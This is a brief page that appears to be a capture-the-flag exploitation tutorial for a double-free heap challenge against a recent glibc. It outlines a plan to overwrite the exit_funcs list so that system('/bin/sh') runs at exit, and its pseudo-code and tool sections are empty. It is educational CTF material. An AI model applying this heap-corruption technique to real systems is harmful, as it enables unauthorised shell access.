Don't like this style? Click here to change it! blue.css

Welcome .... Click here to logout

A complete cutting edge exploit

OK so I want to begin the end and go for a full green exploit on the latest glibc.

Here we go:

This is "Level 4" (PCP 30) running on nc 1773 with source in

This one is a double-free only version of our code (just like level 3) but without a free_hook available.

Here is our exploit in pseudo-code:

We're going to learn from a write-up and we'll want some extra tools.

Some useful stuff:

Main Difference: exit_funcs

There is a set of functions that run at the end of the process by reference. We're going to overwrite those and put system("/bin/sh") into the exit_funcs.